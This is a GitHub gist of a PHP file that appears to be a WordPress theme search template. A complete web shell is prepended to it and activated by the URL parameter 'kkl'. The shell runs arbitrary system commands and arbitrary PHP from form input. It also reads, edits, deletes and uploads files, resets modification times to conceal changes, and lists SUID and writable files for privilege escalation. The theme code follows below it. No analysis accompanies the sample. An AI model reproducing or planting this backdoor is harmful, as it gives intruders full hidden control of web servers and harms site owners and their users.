Created
January 17, 2013 18:15
-
-
Save gaker/4558162 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if(isset($_GET['kkl'])) { | |
clearstatcache(); | |
set_magic_quotes_runtime(0); | |
if(!function_exists('ini_set')){ | |
function ini_set(){ | |
return FALSE; | |
} | |
} | |
ini_set('output_buffering',0); | |
if(@set_time_limit(0) || ini_set('max_execution_time', 0)) $limit = 'not limited'; | |
else $limit = get_cfg_var('max_execution_time'); | |
if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){ | |
$_POST = &$HTTP_POST_VARS; | |
$_GET = &$HTTP_GET_VARS; | |
$_SERVER = &$HTTP_SERVER_VARS; | |
} | |
if(@get_magic_quotes_gpc()){ | |
foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); | |
foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v); | |
} | |
function execute($c){ | |
if(function_exists('exec')){ | |
@exec($c, $out); | |
return @implode("\n", $out); | |
}elseif(function_exists('shell_exec')){ | |
$out = @shell_exec($c); | |
return $out; | |
}elseif(function_exists('system')){ | |
@ob_start(); | |
@system($c, $ret); | |
$out = @ob_get_contents(); | |
@ob_end_clean(); | |
return $out; | |
}elseif(function_exists('passthru')){ | |
@ob_start(); | |
@passthru($c, $ret); | |
$out = @ob_get_contents(); | |
@ob_end_clean(); | |
return $out; | |
}else{ | |
return FALSE; | |
} | |
} | |
function read($f){ | |
$str = @file($f); | |
if($str){ | |
$out = implode('', $str); | |
}elseif(function_exists('curl_version')){ | |
@ob_start(); | |
$h = @curl_init('file:/'.'/'.$f); | |
@curl_exec($h); | |
$out = @ob_get_contents(); | |
@ob_end_clean(); | |
}else{ | |
$out = 'Could not read file!'; | |
} | |
return htmlspecialchars($out); | |
} | |
function write($f, $c){ | |
$t = filemtime($f); | |
$fp = @fopen($f, 'w'); | |
if($fp){ | |
fwrite($fp, $c); | |
fclose($fp); | |
$out = 'File saved.'."\n"; | |
if($t && touch($f, $t)){ | |
$out .= 'Last modification time changed.'; | |
}else{ | |
$out .= 'Could not change last modification time!'; | |
} | |
}else{ | |
$out = 'Saving failed!'; | |
} | |
return $out; | |
} | |
function file_size($f){ | |
$size = filesize($f); | |
if($size < 1024) $size = $size.' b'; | |
elseif($size < 1048576) $size = round($size/1024*100)/100 . ' Kb'; | |
elseif($size < 1073741824) $size=round($size/1048576*100)/100 . ' Mb'; | |
return $size; | |
} | |
if(!function_exists('natcasesort')){ | |
function natcasesort($arr){ | |
return sort($arr); | |
} | |
} | |
if(!empty($_POST['dir'])){ | |
$dir = $_POST['dir']; | |
if(!@chdir($dir)) $out = 'chdir() failled!'; | |
} | |
$dir = getcwd(); | |
(strlen($dir) > 1 && $dir[1] == ':') ? $os_type = 'win' : $os_type = 'nix'; | |
if(!$os_name = @php_uname()){ | |
if(function_exists('posix_uname')){ | |
$os_name = posix_uname(); | |
}elseif($os_name != getenv('OS')){ | |
$os_name = ''; | |
} | |
} | |
if(function_exists('posix_getpwuid')){ | |
$data = posix_getpwuid(posix_getuid()); | |
$user = $data['name'].' uid('.$data['uid'].') gid('.$data['gid'].')'; | |
}else{ | |
$user = ''; | |
} | |
$safe_mode = get_cfg_var('safe_mode'); | |
$safe_mode ? $safe = 'on' : $safe = 'off'; | |
execute('echo ssps') ? $execute = 'on' : $execute = 'off'; | |
$server = getenv('SERVER_SOFTWARE'); | |
if(!$server) $server = '---'; | |
$out = ''; | |
$tail = ''; | |
$aliases = ''; | |
if(!$safe_mode){ | |
if($os_type == 'nix'){ | |
$os .= execute('sysctl -n kern.ostype'); | |
$os .= execute('sysctl -n kern.osrelease'); | |
$os .= execute('sysctl -n kernel.ostype'); | |
$os .= execute('sysctl -n kernel.osrelease'); | |
if(empty($user)) $user = execute('id'); | |
$aliases = array( | |
'' => '', | |
'find suid files'=>'find / -type f -perm -04000 -ls', | |
'find sgid files'=>'find / -type f -perm -02000 -ls', | |
'find all writable files in current dir'=>'find . -type f -perm -2 -ls', | |
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', | |
'find all writable directories and files in current dir'=>'find . -perm -2 -ls', | |
'show opened ports'=>'netstat -an | grep -i listen', | |
); | |
}else{ | |
$os_name .= execute('ver'); | |
$user .= execute('echo %username%'); | |
$aliases = array( | |
'' => '', | |
'show runing services' => 'net start', | |
'show process list' => 'tasklist' | |
); | |
} | |
} | |
if(!empty($_POST['cmd'])){ | |
$out = execute($_POST['cmd']); | |
} | |
elseif(!empty($_POST['php'])){ | |
ob_start(); | |
eval($_POST['php']); | |
$out = ob_get_contents(); | |
ob_end_clean(); | |
} | |
elseif(!empty($_POST['edit'])){ | |
$file = $_POST['edit']; | |
$out = read($file); | |
$tail = '<input type=hidden name=dir value="'.$dir.'"><input type=hidden name=efile value="'.$file.'"><br><input type=submit>'; | |
} | |
elseif(!empty($_POST['save'])){ | |
$out = write($_POST['efile'], $_POST['save']); | |
} | |
elseif(!empty($_POST['remove'])){ | |
$obj = $_POST['remove']; | |
@is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj); | |
$res ? $out = 'Removed successfully' : $out = 'Removing failed!'; | |
} | |
elseif(!empty($_POST['newdir'])){ | |
@mkdir($_POST['newdir']) ? $out = 'Directory created.' : $out = 'Could not create directory!'; | |
} | |
elseif(!empty($_POST['newfile'])){ | |
@touch($_POST['newfile']) ? $out = 'File created.' : $out = 'Could not create file!'; | |
} | |
elseif(!empty($_POST['alias'])){ | |
$out = execute($_POST['alias']); | |
} | |
elseif(!empty($_FILES['ufile']['tmp_name'])){ | |
if(!is_uploaded_file($_FILES['ufile']['tmp_name']) || @!copy($_FILES['ufile']['tmp_name'],$dir.chr(47).$_FILES['ufile']['name'])) $out = 'Could not upload file'; | |
else $out = 'Uploaded successfully.'; | |
} | |
print<<<here | |
<style> | |
table {font:9pt Tahoma;border-color:white} | |
input,select,file {background-color:#eeeeee} | |
textarea {background-color:#f2f2f2} | |
</style> | |
<br> | |
<center> | |
<table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver> | |
<tr> | |
<td> | |
<form method=post> | |
<table cellpadding=1 cellspacing=0 border=1 width=650> | |
here; | |
if(!$safe_mode) print<<<here | |
<tr> | |
<td> | |
cmd | |
</td> | |
<td colspan=8> | |
<input type=text name=cmd size=97> | |
</td> | |
</tr> | |
here; | |
print<<<here | |
<tr> | |
<td> | |
php | |
</td> | |
<td colspan=8> | |
<input type=text name=php size=97> | |
</td> | |
</tr> | |
<tr> | |
<td> | |
actions | |
</td> | |
<td> | |
edit | |
</td> | |
<td> | |
<input type=text name=edit size=14> | |
</td> | |
<td> | |
remove | |
</td> | |
<td> | |
<input type=text name=remove size=14> | |
</td> | |
<td> | |
new_dir | |
</td> | |
<td> | |
<input type=text name=newdir size=14> | |
</td> | |
<td> | |
new_file | |
</td> | |
<td> | |
<input type=text name=newfile size=15> | |
</td> | |
</tr> | |
here; | |
if($aliases){ | |
print<<<here | |
<tr> | |
<td> | |
aliases | |
</td> | |
<td colspan=8> | |
<select name=alias> | |
here; | |
foreach($aliases as $k => $v){ | |
print '<option value="'.$v.'">'.$k.'</option>'; | |
} | |
print<<<here | |
</select> | |
<input type=submit> | |
</td> | |
</tr> | |
here; | |
} | |
print<<<here | |
<tr> | |
<td> | |
dir | |
</td> | |
<td colspan=8> | |
<input type=text value="{$dir}" name=dir size=97> | |
</td> | |
</tr> | |
</form> | |
<form method=post enctype=multipart/form-data> | |
<tr> | |
<td> | |
upload | |
</td> | |
<td colspan=8> | |
<input type=file name=ufile size=76> | |
<input type=hidden name=dir value="{$dir}"> | |
<input type=submit> | |
</td> | |
</tr> | |
</form> | |
</table> | |
<table cellpadding=0 cellspacing=0 border=1 width=650> | |
<form method=post> | |
<tr valign=top> | |
<td width=70% bgcolor=#dddddd> | |
<b>OS:</b> {$os_name}<br> | |
<b>User:</b> {$user}<br> | |
<b>Server:</b> {$server}<br> | |
<b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit} | |
</td> | |
<td rowspan=2 bgcolor=#dddddd> | |
<center>~:(expl0rer):~</center> | |
here; | |
if($dp = @openDir($dir)){ | |
$cObj = readDir($dp); | |
while($cObj){ | |
if(@is_dir($cObj)) $theDirs[] = $cObj; | |
elseif(@is_file($cObj)) $theFiles[] = $cObj; | |
$cObj = readDir($dp); | |
} | |
closedir($dp); | |
} | |
if(!empty($theDirs)){ | |
natcasesort($theDirs); | |
if($os_type == 'nix'){ | |
foreach($theDirs as $cDir){ | |
$color='black'; | |
if(is_writeable($cDir)){ | |
$color='red'; | |
}elseif(is_readable($cDir)){ | |
$color='blue'; | |
} | |
print "<font color=".$color."><".$cDir."></font><br>"; | |
} | |
}else{ | |
foreach($theDirs as $cDir){ | |
$tmp = $cDir.'/.ssps_tmp'; | |
if(@touch($tmp)){ | |
$color='red'; | |
unlink($tmp); | |
}elseif(opendir($cDir)){ | |
closedir(); | |
$color='blue'; | |
}else{ | |
$color='black'; | |
} | |
print "<font color=".$color."><".$cDir."></font><br>"; | |
} | |
} | |
} else print '<br>open_basedir restriction in effect. Allowed path is '.get_cfg_var('open_basedir'); | |
print '<br>'; | |
if(!empty($theFiles)){ | |
natcasesort($theFiles); | |
print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">'; | |
foreach($theFiles as $cFile){ | |
$size = file_size($cFile); | |
if($fp = @fopen($cFile, 'a')) $color = 'red'; | |
elseif($fp = @fopen($cFile, 'r')) $color='blue'; | |
else $color = 'black'; | |
@fclose($fp); | |
print '<tr><td width=100%><font color='.$color.'>'.$cFile.'</font></td><td align=left>'.$size.'</tr>'; | |
} | |
print '</table>'; | |
} | |
print<<<here | |
</td> | |
</tr> | |
<tr valign=top> | |
<td align=center> | |
<form method=post> | |
~:(results):~ | |
<textarea name=save cols=55 rows=15>{$out}</textarea> | |
{$tail} | |
</form> | |
</td> | |
</tr> | |
</table> | |
</form> | |
</td> | |
</tr> | |
</table> | |
here; | |
die; | |
} | |
?> | |
<?php $post_number = get_option('modest_searchnum_posts'); ?> | |
<?php get_header(); ?> | |
<?php include(TEMPLATEPATH . '/includes/top_info.php'); ?> | |
<div id="left-area"> | |
<?php $i = 1; ?> | |
<?php | |
global $query_string; | |
parse_str($query_string, $qstring_array); | |
$args = array('showposts' => $post_number,'paged'=>$paged); | |
if ( isset($_GET['et_searchform_submit']) ) { | |
$postTypes = array(); | |
if ( !isset($_GET['et-inc-posts']) && !isset($_GET['et-inc-pages']) ) $postTypes = array('post'); | |
if ( isset($_GET['et-inc-pages']) ) $postTypes = array('page'); | |
if ( isset($_GET['et-inc-posts']) ) $postTypes[] = 'post'; | |
$args['post_type'] = $postTypes; | |
if ( $_GET['et-month-choice'] != 'no-choice' ) { | |
$et_year = substr($_GET['et-month-choice'],0,4); | |
$et_month = substr($_GET['et-month-choice'], 4, strlen($_GET['et-month-choice'])-4); | |
$args['year'] = $et_year; | |
$args['monthnum'] = $et_month; | |
} | |
if ( $_GET['et-cat'] != 0 ) | |
$args['cat'] = $_GET['et-cat']; | |
} | |
$args = array_merge($args,$qstring_array); | |
query_posts($args); | |
?> | |
<?php if (have_posts()) : while (have_posts()) : the_post(); ?> | |
<?php include(TEMPLATEPATH . '/includes/entry.php'); ?> | |
<?php endwhile; ?> | |
<?php | |
if(function_exists('wp_pagenavi')) { wp_pagenavi(); } | |
else { include(TEMPLATEPATH . '/includes/navigation.php'); } | |
?> | |
<?php else : ?> | |
<?php include(TEMPLATEPATH . '/includes/no-results.php'); ?> | |
<?php endif; wp_reset_query(); ?> | |
</div> <!-- end #left-area --> | |
<?php get_sidebar(); ?> | |
<?php get_footer(); ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment